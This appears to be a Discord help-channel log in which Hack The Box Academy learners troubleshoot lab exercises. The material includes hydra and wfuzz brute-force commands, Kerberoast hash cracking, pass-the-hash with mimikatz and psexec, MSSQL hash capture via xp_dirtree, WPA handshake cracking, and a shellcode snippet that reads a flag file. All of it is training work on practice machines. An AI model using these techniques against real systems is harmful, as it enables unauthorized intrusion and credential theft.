#modules

It can do both

Well first of youd need a wifi card like this one link

With that you can start listening to many different interfaces

airmon-ng is the tool for that

With aircrack you can then crack the required handshake.

Well thats just a smart portion

It prefers kerberos creds since youre requesting domain info, however since you're providing a valid user and password, it works

It's too long to shrink

:^>

That's what she said..

🙈

well the thing is that it doesn't provide the ST ticket

Stepped outside. It shrank

thanks a lot,i may write it in a theoritical perspective,because i do not have a card to listen

Use INLANEFREIGHT instead of inlanefreight.local

Domains are weird sometimes

lemme try

Here a small guide/writeup for it
https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46

Its always a bit hard to understand if you cant do it yourself!

Those WiFi devices that support monitor / inject etc are stupid cheap on eBay

(For educational)

Just gotta be sure to pick the right one

Yea like 40€+

yep, make sure to get one that supports NETLINK like the realtek ones

same thing

I still have mine from a few years ago. Still works like a charm

You can do it with a Pi IIRC

What module/section?

Did a demonstration years ago with one

final assessment for Kerberos attacks q 3

Damn i didmt know you can

Yep, Pi Zero I think it was

Those tiny mofos

thanks ❤️

however it works on the inside machine which chisel /server is running on

Ah I haven't touched that so couldn't tell you

Maybe only specify user then enter password?

like why would it be looking for kerberos ticket...

i tried it same thing

Because that's part of a userspn

Most service accounts are assigned a ticket

user spn is: HTTP/inlanefreight.local:1433

So they can do the thing

¯_(ツ)_/¯

https://learn.microsoft.com/en-us/windows/win32/ad/how-clients-compose-a-serviceampaposs-spn

Http sounds odd on port 1433

yea..

thats what it provides tho..

and you can't do anything with that spn? ¯_(ツ)_/¯

could probably use bloodhound to find the answer

Your message is getting deleted because automod is thinking it's spam

yep

Read and follow #welcome

Also formatting with ``` on the line before and after makes it look better

found the 'cause... i had KRB5CCNAME var setup and initialized to ./DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache

in that particular terminal

Ah

I typically will do just single command usage of KRB5CCNAME like this:

KRB5CCNAME='Administrator@TERMSRV_DC01@INLANEFREIGHT.LOCAL.ccache' psexec.py -k -no-pass $dom/Administrator@DC01

hello, I'm on the privesc of nibbles, I run the sudo command and it asks for a password. The walkthrough says it should just go without it, but its not

sudo /full/path/to/file.sh

This is assuming 1: you unzipped the file and 2: added the relevant line to the end of the file

yes and yes

A way to find out would he to do a command like sudo -l

Sudo perms require (at least afaik) the full path to the file

At least to abuse them

that was it, needed the full path

thanks!

Gl for next bits

<@&861185840277487616>

Nice bit.ly link

Thanks for the heads up. Should be cleaned up now.

note: use slim ISO for blackarch.

yo, how did u fix this? https://cdn.discordapp.com/attachments/1215070953139085344/1236885893609029763/image.png?ex=6639a341&is=663851c1&hm=53784665da90f038786a4ee495d9d9646d7356b50973f0f9a8717cbcb82da13b&

my specific issue, it was a problem with new line characters

that's how i fixed ir

If you want to embed images; read and follow #welcome

it was an extra blank line on the end of "end certificate" -_-

ty

btw, can i dm? @supple gorge i think i know u

Haha you might. Feel free to dm

after transferring cert.pfx to the downloads folder for this module, im running the .\rubeus.exe command in that same one, but its giving me network password is not correct. any idea why?

hi

Usually domain controllers are dc01 so maybe that's it?

Usually you can ping the dc

what module

what is wrong with my command
wfuzz -z file,/Desktop/test.txt -z file,/Desktop/test.txt http://83.136.252.32:38065 -d "username=FUZZ&password=FUZ2Z"
module BROKEN AUTHENTICATION
Default Credentials

for one you have two -z parameters

which wordlist u used here

I haven't done that module

gm

Check the response and see if you can get something useful from there, I didn't need to brute-force the login form even though the exercise wants you do that

i solved it with burp but i need help with the wfuzz brute forcing syntax if u can

hey guys so i recently tried to install tails os using a usb stick but whenever i load it and also boot mode is enabled so whenever i load it it leads me back to windows so can anyone suggest me how can i change

The support bubble wont pop up for me ( ive disabled adblock ) and whenever I load the page it says adblock is the reason

You probably need to change the boot order in BIOS

You can also contact support by e-mail

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

okay thankyou!

i did still leads to same thing

i have chosen legacy first

The -p for proxy is optional

wfuzz -w usernames.txt -w password.txt -d 'Username=FUZZ&Password=FUZ2Z' -p localhost:8080 http://<target-url>:<port>

You have instructed your PC to boot from your USB stick first?
Is your Linux installed correctly on the stick so that the stick is bootable?

yes i checked and verfied it

Maybe you'd better ask in the channel #homelab-sysadm because it has nothing to do with the Academy modules

ohk

but its showing no access so can you help

Read and follow #welcome

thankyou

I'm fuzzing like an hour now but no progress

In the ffuf module assignment

shouldn't take that long

I stuck at ||courses directory in both archive and faculty||

thanks brother i dont know why the cheatsheet is this
wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"
yours works this one dont work at all

Because it's using placeholders that you have to change yourself

i forsure changed the placeholders

Well I'm just going off what you copy pasted right here

Is the port right?

yup
this is what worked
wfuzz -w dis.txt -w dis.txt -d 'Username=FUZZ&Password=FUZ2Z' http://94.237.63.83:35848
this is what is in the cheat sheet
wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"
this is what i was using and didnt work
wfuzz -z file,/Desktop/test.txt -z file,/Desktop/test.txt http://83.136.252.32:38065/ -d "Username=FUZZ&Password=FUZ2Z"

the command I have suggested with -w is just an alias for -z (I read the man page), you can try to see if the problem is with the url being positioned in the middle. In the command below is at the end:
wfuzz -z file,~/Desktop/test.txt -z file,~/Desktop/test.txt -d "Username=FUZZ&Password=FUZ2Z" http://83.136.252.32:38065/

Well /Desktop/ isn't a valid filepath

Unless you have a Desktop file in your filesystem root

Idk if it would let you do ~/Desktop/test.txt

thhanks mates ❤️

Ok so I'm out of idea

All I got rn is || http://archive.academy.htb/courses/index.php|| and ||http://faculty.academy.htb/courses/index.php|| which is nothing

Module name?

Attack web application with ffuf module

which part exactly ?

Stuck at the third exercise

Here it need you to find a page that ||said 'You don't have access!'||

which one ?

Skill assignment

Are you setting your filter to match content or whatever? So that it matches the text?

-m is for matching

-f is for filtering out

I only filter the matching word rn

Again, make sure you use the right thing with ffuf

-f[n] filters out, meaning you don't see what you put
-m[n] matches what you filter for

Yes,Ik

¯_(ツ)_/¯

I filter them out because it will show every single one

Plus it length doesn't the same

If you're too restrictive then you might miss it

ffuf doesn't had match content,does it?

Also I think no access is like a 401 code if that helps any

It does

Do ffuf --help to see all options

For every -f option there's a -m

I mean it content

I mean there's match lines and match words mode

All I got is 403

403 is the forbidden code, yes

Maybe

It about my dns

¯_(ツ)_/¯

I only use header to get to the site

LMAO

I waiting so long

Lmao made some adjustments eh?

No

I just happened to found

Ah

During conversation

Lol

Patience is king

Patient is virtue

Sadly virtue is not patient

For the second question on the 1st Brute login assessment, when I run the hydra command , I am not sure why its saying the rockyou.txt is not found when its clearly there in the directory.

"Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside"

https://academy.hackthebox.com/module/57/section/515
||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 94.237.57.59 -s 36768 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"||

Try with the /usr/share/ one

Could anyone help me out? How can I search for L____r in poweshell without the errors? When I only do strings I don’t get errors

Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?

i tried
Get-ADUser -Identity Robert

and it says Robert is wrong or something

cant think of anything else im not gonna lie

wait

Because I believe identity searches samaccount name

Not the given name

i got it

Nice

ah alright

I tried that but what was also the issue was that I wasn't using the sudo command . For whatever reason , the rockyou.txt that was in the leaked database directory required a sudo command because I needed to use the sudo command in order to open the file.

¯_(ツ)_/¯

For anyone who has already completed this assessment, How long should it take you to run the hydra command in this case?

not more than 5 minutes

Minds is taken longer than five minutes. Could it be that lab instance computer processing power isn't the same?

nope

Why do you think mine could be running slow?

If you are using rockyou.txt you would have to change your approach

did you checked the hint

||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters."

Yes. I already went to the view source code page of that login.php form, looked at the '<form-name=' section and made the corrections for my hydra command.
||

generate a wordlist based on the requirements presented from the previous assessment

use the name that was found earlier

previous assessment? I am still on the first assessment.

oh, for the first one think of something that lazy administrators do

I corrected the php command , ran it and it currently is still running. Should I create a wordlist rather than use existing wordlists?

|| sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 83.136.255.150 -s 32876 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" -t 4
||

anyone else seeing huge latency spikes and packet drops us-east-1?

rtt min/avg/max/mdev = 19.223/209.673/1927.075/488.385 ms, pipe 2

Hey Guys - Can i please have some asisstance on this - INTRO TO ASSEMBLY LANGUAGE

During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.
``` Need help on this Digital fornesics module

I found the zone idenfifier with the IP + file name but the filename is still uninstall.exe 🤔

Zone.Identifier information never changes. based on that, think of something to check to correlate the Zone.Identifier info

no

it doesn't matter how many excuses you give, nobody is giving you the flag

if you're having issues with connectivity and it's not on your end, reach out to support

if the module didn't give you these creds, delete this message

i dmed u

i'm not looking at DMs.

please ask next time before DMing

alright then can u elaborate more on the zoneinfo thing, i still dont get what u mean

the zoneinfo in MFT just shows uninstall.exe though:/ I filtered every zoneinfo in the MFT and only found other unrelated exes

you have the Zone.Identifier info, and you know the attacker renamed the file. how can you determine file rename events?

once you figure that out, correlate what you find with the Zone.Identifier information, and you will know which file was renamed

just look for file rename events

ahhh alright thanks alot!

Hello, I need help to solve an easy problem of hackthebox, it is a challenge, this does not require any knowledge in vhdl but rather it is about the logic of it to be able to decipher the flag, VHDLOCK to be more exact, any help write to me in DM thanks

Which module and which section?

I am still stuck on - "Intrusion Detection With Splunk (Real-world Scenario)" Q3 find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
Ive tried - 'clr.dll | stats count by Image'
Get around 26 results, but none of these were the answer.
clr.dll | stats count by ProcessName ParentProcessName
Similair processes found in .exe but none of these were correct either. Any hints or DM assistance appreciated.

Hi! Im stuck on an easy section on the "LINUX PRIVILEGE ESCALATION" module, "Sudo Rights Abuse".

"What command can the htb-student user run as root?"

In my world i was sure that i just had to check "sudo -l". But apperently im missing something right? openssl gets marked as incorrect

did you check the GTFObins ??

for openssl?

maybe

i could check, but i thought the question was which command i could run as root, whetever it was exploitable or not?

aaah maybe check with the absolute path

wow that did it haha. Thanks

hello guys a quick quest regarding AD : In a DC does the builtin\Administrators have higher privileges than Domain Admins on that DC particularly ?

The top answer here should help: https://serverfault.com/questions/174200/domain-admins-vs-administrators-in-windows-ad-dc

thanks

yea i think bultin\administrators have higher privs on the DC itself than the Domain Admins

It's been like this for a while

Sorry for a general question, but are there any way to debug why the ssh connection is super laggy? Switched vpn, didnt work. Trying to figure it if its the box or something i can do on my machine

ok got it, idk how did i miss the obvious answer but thanks alot of helping 🫡

Can anybody help me understand the highlighted line? does that mean that the IP address of the Decoy must be a real one that is running?

Why I can't Post images

because you didn't follow the rules

What rules

You mean roles

#welcome

Hy

Good afternoon all. I have a question. I am working on the "Using Web Proxies" module and I am stuck on the section on "ZAP Fuzzing". I had no issue with the content, and was able to half way through the question at the end, but I am stuck. I fuzzed the cookie using the wordlist as instructed, but I am not seeing a flag returned, or any clue on how to proceed. I am just looking for a little guidance, not the full answer. SOLVED

Hi im doing the YARA and Sigma module and have been stuck on one question for days and I cant solve it at all. Help
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I understand that you need to do strings or look in HxD and i have done that and been scrolling for hours. Someone tell me how you guys got it without wasting so much time

hi, i cannot log into my account anymore where can i contact support for academy?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Hi, Is there problems if I used Nmap on a random website?

yeah, you're not authorized to test those machines

Can I use xrdpfree to download the damn Seatbelt.exe and just run grep on it?

help

Seatbelt.exe is a .NET assembly. there should have been some info earlier in the module about analyzing those. review the Manually Developing a YARA Rule section

I have done strings on it as that sections tell you to. but i have been scrolling for hours

read carefully. it is a .NET assembly that you are analyzing. look at the section again

there's a program that you can use that will help immensely

I tried this command but only errors monodis --output=code Seatbelt.exe

did you try anything else

yes im reading about monodis but i only keep getting errors from it

try another program

So they detecte it as threat

Ok i have opened it in dnSpy now

did you seriously just do that?

Don't worry this is not real scan lollll

This is generated by chat gpt

found it, thank you so much

Someone sees the bug here in the hash format of a kerberoasting attack, I dumpee it with rubeus.

Is it all on 1 line?

And have you tried with hashcat?

I have applied a xargs to put it on the same oneliner and nothing.

Did you end up finding this with dnSpy?

Can you open it in a text editor for me?

And try with hashcat

Instead of John

This mode, I think it was 18200.

hello im doing Attacking Common Applications - Skills Assessment II and on the question What is the name of the public GitLab project? i have found the public gitlab project but its not taking the name as the correct answer so im not sure if its in a different format or theres a different name somewhere inside of the project bc ik its that one since i used that project to complete the rest of the other questions

For tgs it's 13100

It is in an oneliner

18100 is for asrep

13100

Aaa okey it already worked with that mode, thanks

But with john it should also work, right? It should detect the hash

It should auto detect

If you're unsure always check the signature with the hashcat wiki

If it doesn’t you can just check example hashes

John can be a bit dumb at times

Jajajaja

Try specifying --format=krb5tgs

And I believe it should be -w= instead of -w:

Also I don't recall the format being -w:

I use —wordlist=

That could also be a contributing factor

Nothing works either

There must be something that john doesn't like.

Are you still doing -w:

If it's the way I've always done it

john —wordlist=/usr/share/wordlists/rockyou.txt —format=krb5tgs hash

Try that

Weird.

He doesn't get it anyway, there must be something xd

Pull hashcat and you're done

You’re using the same hash?

yes

As in one screenshot you use hash, and the other hashes.kerberoast

Because I copied it to another file, but come on, the hash file with hashcat works but with john it does not.

🤷🏼‍♂️

Heh question, I'm on Footprinting > SMB , final question
What is the full system path of that specific share? (format: "/directory/names")

but when I put in /home/sambauser or /home/sambauser/contents It says neither of those are correct

Why contents instead of the name of the share?

because it asks for full path

Path looks like /home/sambauser/sambashare in that case

nope

Try it like it’s shown on the rpc path

C:\home\sambauser\

Hint says otherwise
Remember that Linux-based operating systems do not have a "C:" drive.

This is last question of footprinting smb?

yes

/home/sambauser

wtf

i did that

That should work

it did, but i had already done that, lol

Perhaps a typo

i'll assume that, call me crazy

You’re crazy

thanks, so i had the right idea but must have been a typo or something

And thanks, I am crazy

"I swear I tried that" is a mood echoed too many times

you're blue now?

congrats on being blue

A darker blue. Like more of a teal

congratz for the role marcie deserved

Read and follow #welcome

😦

new role ?

#📣-announcements message

yeah , I just read that

Hello everyone

My question if i want to know traffic analyzier its important for networking

Analyzing network traffic is important for SOC roles

Also pentester

I read it in pentster

Eh there's tools used that sniff specific things on the network

But you're not needing to manually sift through anything

Its for tcp udp right

what's up y'all, I'm just trying out academy and starting out in the AD enum & attacks module to get a feel for how this all works. Going through the "Initial enumeration of the domain" portion and running wireshark in the rdp session currently. I'm not getting any MDNS packets as the material specifies how we can identify the "ACADEMY-EA-WEB01" host. I'm only getting NBNS packets showing ACADEMY-EA-WEB0. Just wondering if I'm doing something wrong or that this is expected

It's a minor bug

ahhh gotcha. Just wanted to make sure, I was racking my head like what could be different with what I'm doing lol

Also ad enum and attacks is a midpoint module for the pentester path

And assumes knowledge of concepts that may have been presented previously

Right, I'm coming over from finishing the TCM Sec PEH course

Every module has a "pre-requisite" module so to speak

It's also recommended to do the CPTS path in order

Just trying to find material related to what I went over in that course and find other ways to go about using the same tools or find new tools that weren't used in that course

just a recommendation as CPTS is more challenging and thorough than other intro pentest exams ¯_(ツ)_/¯

Completely understand! Thanks for the info

And if anything, if you already know the tools and techniques, you can breeze through the early bits

Yeah I hear that, they didn't go through packet sniffing for enumeration on an internal network in the PEH so that caught my attention right at the beginning hahaha

Which there's dedicated tool

U mean cpts giving more pentesting information

@fathom pendant

Yes

I will start after
The pentesting

Cpts

After the info security

Going to pentesting after that I will took cpts in hack the box

And taking bug bounty

@fathom pendant

Is that a question?

Please stop mentioning me, you're not posing a question so whatever works for you

What you mean whatever works for you

As in whatever path forward works to get you to your goal

What do you mean with path forward

@fathom pendant

echo $PATH

Thank you I will study towards /usr/local/sbin first

does anyone has any idea,about this error ? sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages .i try to install ypthon3-neo4j i get error,i cant fix broken packages or something,there is none

what OS are you using?

Parrot

ah yeah no idea what that comes with. sounds like you need to install python3-neo4j first. you could also just try installing netexec instead, as it's the successor to cme.

it doesnt let me install neo4j,i really dont know why

probably have to read the error messages

Get netexec instead of cme

Check their site to see how to do it

https://neo4j.com/docs/operations-manual/current/installation/linux/debian/#debian-installation

thanks for the help

when will this happen

Cme generally isn't installed via apt

Also install netexec instead

It's already available for annual subs

It's in settings

I need help

with......... ?

module:Password attacks
Section:pass the hash
Got david flag quite easy but still a question on my mind since AD is probably the least ive work with in the past:
|| so once you pass the david hash you get a shell as NT authority. Is there a reason you cant access DC01 david with impacket-smbexec? after i failed with it, i tried with with mim and it worked. ||

Feeling like i'm missing something obvious in 'Attacking Common Services : Attacking SQL Databases" on the first question...which is just "What is the password for the 'mssqlsvc' user?" lol....We are given creds to login, which I use to show me the tables (master, msdb, tempdb, hmaildb, flagdb)....don't have permissions to the last two. I've seen other hints to use Responder and capture the MSSQL hash...but that's not doing anything for me as xp_dirtree shows nothing and no permissions for xp_subdirs. Also can't enable xp_cmdshell due to privileges. I've tried a one-liner for impersonation to mimic the command in the module (see below) but that also returns blanks:

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

Used impacket-mssqlclient.py to access SQL. Any hints that extend beyond 'check responder section' or "USE <DB name> to use a DB, SELECT * FROM <DB Name>.INFORMATION_SCHEMA.TABLES to get tables in a DB, SELECT * from <table name> to get table contents"....would be amazing as I don't see any tables in any of those DBs listed above that are going to give me the info I"m looking for...password, hash, or otherwise.

System isn't a domain account

well i understand that but both were nt authority, the mimikatz and via impacket

I don't recall elevating anything ¯_(ツ)_/¯

I just connected via smbclient and read the thing

It's been a minute though

I might be thinking of PTT

sht ill delete the second ss since it contains hash

that one is showing a flag

well yea but why does the first one have access to it?

while the second not?

have you turn on responder?

i'm going to guess because david has access to that and the system account doesn't

^

Because DC01 is a separate machine it doesn't have the same permissions

ACLs go brrr

so just because i added /domain:xxx.htb it worked on mimikatz?

Thank you for this info, glad I was here to see it!

no. we have no idea the steps you took up to this point, but that file can only be accessed by the account 'david', and on the screen where you don't have access you're not logged in as david so you don't have permissions to view it

i can dm you the steps but for me both look like they are nt authority?

maybe im just plain stupid here and missing the point

does your mimikatz syntax include /user:david and /run:cmd.exe?

it does

that's why

when you do that, it opens a cmd.exe window under the user context of david

with his permissions

oooh so im actually in davids permission with that

yes

that makes sense

ok ty added to my notes

nt authority/system is the local system account for the computer, david's account is an active directory account. the local system doesn't have privileges to access david's files

yea i guessed that but was consfused why one has priv while other doesnt if they are both same user, but yea seems like with mimi we got davids perms while still under nt auth

makes sense, tyvm

That "Using Web Proxies" module just about cooked my brain, but I managed to finish the skills assessment!

Is there some tech support I can contact regarding this attacking common services/attacking SQL Databases module? I've done the 'Show Solution' option and on both(separately) my box and the PWNBOX to steal the MSSQL service account hash..following step-by-step and the hash does not show up via the documented impacket-smbserver or when I tried responder instead. Also tried terminating and starting up a fresh version of the target server

looked on the site but didn't see anything

How are you trying to grab the hash?

xp..dirtree //your_ip/share

Try using the command exactly as shown in the module

Responder also needs to be specified to your tun0 interface

like responder -I tun0?

i've done the commands exactly as shown...the one command that I'm wondering about is sudo impacket-smbserver share ./ -smb2support, but i'm assuming the ./ is the share for the 'current working directory' on your box

well, you say you've done the commands exactly as shown, but what you showed us here is not the same as what's in the module. so which is it?

Yes

Correct cwd

Smb requires the sharename to connect

The sharename is "share"

smbserver <sharename> <path> [options]

sqlcmd -S 10.129.251.65 -U htbdbuser
sudo impacket-smbserver share ./ -smb2support

(inside sql):
EXEC master..xp_dirtree '\10.129.251.65\share'
go

Why are you using the box ip?

yeah lol

that should be the listening IP i now assume

yeah i don't think 10.129.251.65 is "your_ip"

How do you steal the hash if you don't have it connect to you

sorry all lol

about as dumb as it gets

thanks

Is it normal when using pwnbox that every 3-5 minutes your ssh session to the target you connect to is no longer responsive and then you have to kill the target and respawn it?

no, only really see that if people are brute forcing incorrectly or something

I am doing linux fundamentals in academy and just running ls commands and the target stops responding, as well as to pings. Respawning a new target fixes it for about another 3-5 min

no one here can really help with that, you'll have better luck reaching out to support on the site

Try changing vpn regions (vpn is different from Pwnbox)

And yes, it will affect even though your using pwnbox

Pwnbox region = attack box
Vpn region = target box

Does chaning the VPN Servers region work even if I dont download the VPN connection file? Is it associated with my account. So when I spawn a target it uses the VPN Servers dropdown I had selected?

AD Enumeration & Attacks - Skills Assessment Part I
I try to upload chisel thru the webshell but it just gives me erorr and wont upload chisel

try reading the error

Yes, as I just said

Vpn region dictates spawn region for the targets

Okay thank you. I am testing that

Use the IP adress that you spawned with the port number.

You might need to restart the pwnbox for it to work right

We need more information beyond 'there's an error', we can't see your screen or the error or anything. that said, there are many ways to transfer files. try using the shared folder function in remmina, or the /drive parameter in xfreerdp.

Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.

Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".

<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>

Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.

<!-- Web.Config Configuration File -->

<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>

looks like the first two paragraphs explain how to view the error. how did you start this web server?

lab

no i mean it has upload button

are you able to execute code? even if you're able to upload chisel, without code execution it isn't going to do much. maybe focus on getting a shell first.

Configuration was wrong here for cert.pfx. I used proper vpn and re did all steps I needed to and it worked.

Sad :( I was gonna repost it so it embeds

finished the Kerberos attacks..

whoever has q's, shoot me dm

Nice. What is next?

tbh don't know, probably will finish something on the close subj, like DACL attacks

ad/windows

DACL attack was really fun

ye?

so was ADCS if you haven't done that

nope haven't

thanks, i'll think about it

I start that one tomorrow. I just finished LDAP and did it all with windapsearch, ldapsearch and ldapsearch-ad from linux. Learned a lot.

👍

I have read somewhere that CPTS is closest to what presented on OSCP, is that true guys?

I haven't taken the CPTS, I do have the OSCP. OSCP seems a bit more script kiddie type of test. Find application name/version, search for exploit to get foothold.

CPTS does not seem to include known vulns with existing POCs for footholds. At least that is the feeling I get.

Got it, thank you

• 1 Submit the contents of the C:\flag.txt file on MS01. any advice on how to access ms01? AD Enumeration & Attacks - Skills Assessment Part II
  i tried xfreerdp ssh power etc

It surpasses OSCP in depth

Doing the CPTS exam right now and looked over the course material for OSCP and CPTS covers 95% of what you need to know for OSCP. If you are interested in either then I would do the CPTS path and once you have your CPTS go for OSCP. CPTS will be more useful and teach you more but OSCP will look better on a CV. OSCP doesnt cover nearly as much or as indepth as the CPTS

why not tho

if i do full cpts path can i just do oscp

You have a username and password, use those

ik i got it

Remember the entirety of the domain is on an internal network

So you either have to A use the provided linux host to jump from or B use a pivot

┌─[✗]─[htb-student@skills-par01]─[~]

[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - failed to open display:
[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

and ok danke does this mean i connected to it too early?

Bro, spoilers for q 1 and 2

soz

If you're ssh into the linux box, that's why

Ssh doesn't carry a display variable

oh ic

but i can only xfreerdp into Ms01 right

¯_(ツ)_/¯

figure it out; it's a skill exam

always be enumerating for new users

you can rdp to the linux box btw

or use pivoting techniques to allow you to connect directly to the MS01 host

lol cant be that easy xd

Not easy, but to me it seems more straightforward.

without doing either it seems to me like oscp is a beginner pentest cert while cpts is more intermediate

There is something to a test that says use any tool you want, and it is still tough, versus a test that restricts tools for fear it will be too easy.

• 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. any tips for this? i tried requesting all spns but none i found all computers, dc and mssql host etc

For enabling Live Rule Reloading Feature through suricata rulesets, when I edit the suricata.yaml file, there is no detect-engine in that file... just curious if im missing something

Brother

Slowly go through the techniques outlined in the module

They will each be useful parts of enumerating the answer

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

why dont this work

do you have an $sid variable set?

Is this the right place to ask a question? I've reached the end to the Intro to Assembly Language I'm trying to figure out how to optimize my assembly code for shellcoding to be less than 50 bytes?

global _start
section .text
_start:
    ; push './flg.txt\x00'
    xor rdi, rdi
    push rdi            ; push NULL string terminator
    mov rdi, '/flg.txt' ; rest of file name
    push rdi            ; push to stack 
    ; open('rsp', 'O_RDONLY')
    mov rax, 2           ; open syscall number
    mov rdi, rsp        ; move pointer to filename
    xor rsi, rsi          ; set O_RDONLY flag
    syscall
    ; read file
    lea rsi, [rdi]      ; pointer to opened file
    mov rdi, rax        ; set fd to rax from open syscall
    xor rax, rax          ; read syscall number
    mov dl, 24         ; size to read
    syscall
    ; write output
    mov rax, 1       ; write syscall
    mov rdi, 1        ; set fd to stdout
    mov dl, 24         ; size to read
    syscall
    ; exit
    mov rax, 60
    ;mov dil, 0
    syscall

ya

i'd ask you to format it better, but automod will be likely to yeet it. (if you read and follow #welcome automod won't yeet it and you can wrap it in ``` to make it more readable

global _start
section .text
_start:
    ; push './flg.txt\x00'
    xor rdi, rdi
    push rdi            ; push NULL string terminator
    mov rdi, '/flg.txt' ; rest of file name
    push rdi            ; push to stack 
    ; open('rsp', 'O_RDONLY')
    mov rax, 2           ; open syscall number
    mov rdi, rsp        ; move pointer to filename
    xor rsi, rsi          ; set O_RDONLY flag
    syscall
    ; read file
    lea rsi, [rdi]      ; pointer to opened file
    mov rdi, rax        ; set fd to rax from open syscall
    xor rax, rax          ; read syscall number
    mov dl, 24         ; size to read
    syscall
    ; write output
    mov rax, 1       ; write syscall
    mov rdi, 1        ; set fd to stdout
    mov dl, 24         ; size to read
    syscall
    ; exit
    mov rax, 60
    ;mov dil, 0
    syscall

im ngl i tried so hard

cant find nuffin....

spraying a password can yield some results, look into the sections that set that up

including ones that would get you domain usernames as a list to pull from

i cok danke

again

as stated; everything you need to complete this (for the most part) is in the module

another revolves around uploading a shell

i co k danke u got any recomenation for password list? im using top 200 there bout 50 accs so... this shid ognna take a lng time...

you don't need a password list to spray

if you're using a password list it's no longer spraying

it's bruteforcing

use a simple easily guessable password

maybe what might be used as an onboarding password

ohh i c anke

I really heavily suggest re-reading and revising your notes on this module

you're overlooking some fairly simple things; tip: when stuck in a module skill assessment -- go through the other module sections, in order, and see what sticks for your scenario

based

I am trying to do windows file transfer module. I have to transfer/upload the file to windows without RDPing. There is an ftp server running. I cant use ftp IP then user htb-student and HTB_@cademy_stdnt! perhaps the problem is the with the special characters in the password. I also have tried to use ftp htb-student:HTB_@cademy_stdnt\!@IP and ftp "htb-student:HTB_@cademy_stdnt\!"@IP but none worked.
Any suggestion?

which section is this? IIRC for any section with a windows target, they provide RDP connection instructions

yeah for windows targets they tend to be rdp; i don't recall ftp being open for them

Thanks for responding. I am NOT having problem with RDPing!
As per the question: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
As per my understanding, we first have to upload the file to the windows and then RDP into it to unzip and run hashing upload_win.txt . I don't know how to upload it without using rdping first.

you can upload with rdp in many ways

xfreerdp has /drive:, you can start an smbserver, you can host an http server

errr we should probably re-word that question 😅 . I think its intended for us to RDP to the box , transfer the file archive + unzip, then run hasher

yeah the word order is off

unless it has something like webDAV running I'm not sure there's any other way to do it. Maybe smbclient?

or even omitting the "RDP to the box" portion

Once uploaded unzip the archive, and run "hasher upload_win.txt"

Ok. Rewording make sense.. else I was beating myself for bing too noob to not come up with something.

i mean you can always scan the box to see what's there

I did

nmap $IP

ftp, smb

is ftp running?

yes

hmm

we could also try connectin to smb as htb-student

could just be a weird thing with your connection not wanting to fully connect to ftp

sometimes it can take a minute after you connect to ftp for it to prompt for username and password

Broken Authentication - Weak Bruteforce Protections in this module how can i do it with burp cause i feel like the script provided is not working

nevermind i did it with burp ❤️

now why the script didnt work ? xd

let me make a note of this , the question might need to be re-worded. It's possible I'm being a dummy but I can't connect to any smb share as htb-student, or ftp, or anonymous ftp . So not sure what other file transfer method we have, besides RDPing into the box

per the official walkthrough: the first step is to RDP

so yeah; wording

roger that . Give me a bit and ill get it updated 💪

note: winrm doesn't work either

neithe does mysql

🥹

i blame g0blin

CrackMapExec.

Bob may use weak password

I still can't guess them

What module/section?

(Have you tried Welcome1)?

re-read that section very carefully

lmk and i can send you modified version of basic_bruteforce.py . Basically , we need to modify it to use regex. So instead of valid = "welcome" , its valid = "HTB{anything}

It realized that there still bunch I doesn't try

I just find it funny

